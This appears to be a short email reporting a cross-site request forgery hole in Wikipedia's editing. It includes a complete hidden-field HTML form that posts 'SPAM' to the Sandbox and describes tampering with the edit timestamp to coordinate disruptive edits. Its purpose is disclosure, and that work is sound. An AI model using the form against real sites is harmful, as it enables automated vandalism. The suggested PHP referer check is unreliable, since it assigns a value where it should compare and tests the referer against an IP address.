Hi,
You need to take steps to prevent malicious scripting- currently various
forms of
<form id="editform" name="editform" method="post"
action="
http://en.wikipedia.org/w/index.php?title=Wikipedia:Sandbox&action=…
"
enctype="multipart/form-data">
<input type='hidden' value="" name="wpSection" />
<input type='hidden' value="20000101010101"
name="wpStarttime" />
<input type='hidden' value="20051216225758"
name="wpEdittime" />
<input type='hidden' value="" name="wpScrolltop"
id="wpScrolltop" />
<input type='hidden' value="SPAM" name="wpTextbox1"
id="wpTextbox1">
<input tabindex='2' type='hidden' value=""
name='wpSummary' id='wpSummary'/>
<input tabindex='5' id='wpSave' type='submit' value="Save
page"
name="wpSave" accesskey="s" title="Save your changes
[alt-s]"/>
</form>
That runs locally and uses basic javascript to change the 'wpEdittime' var
to a few seconds before current time could be used to coordinate disruptive
attacks. I know that it is a simple matter to fix entries, but it is a
simpler matter to stick a
if(getenv("HTTP_REFERER")='207.142.131.202'){}else{//fail handler}
or similar line in the submit function.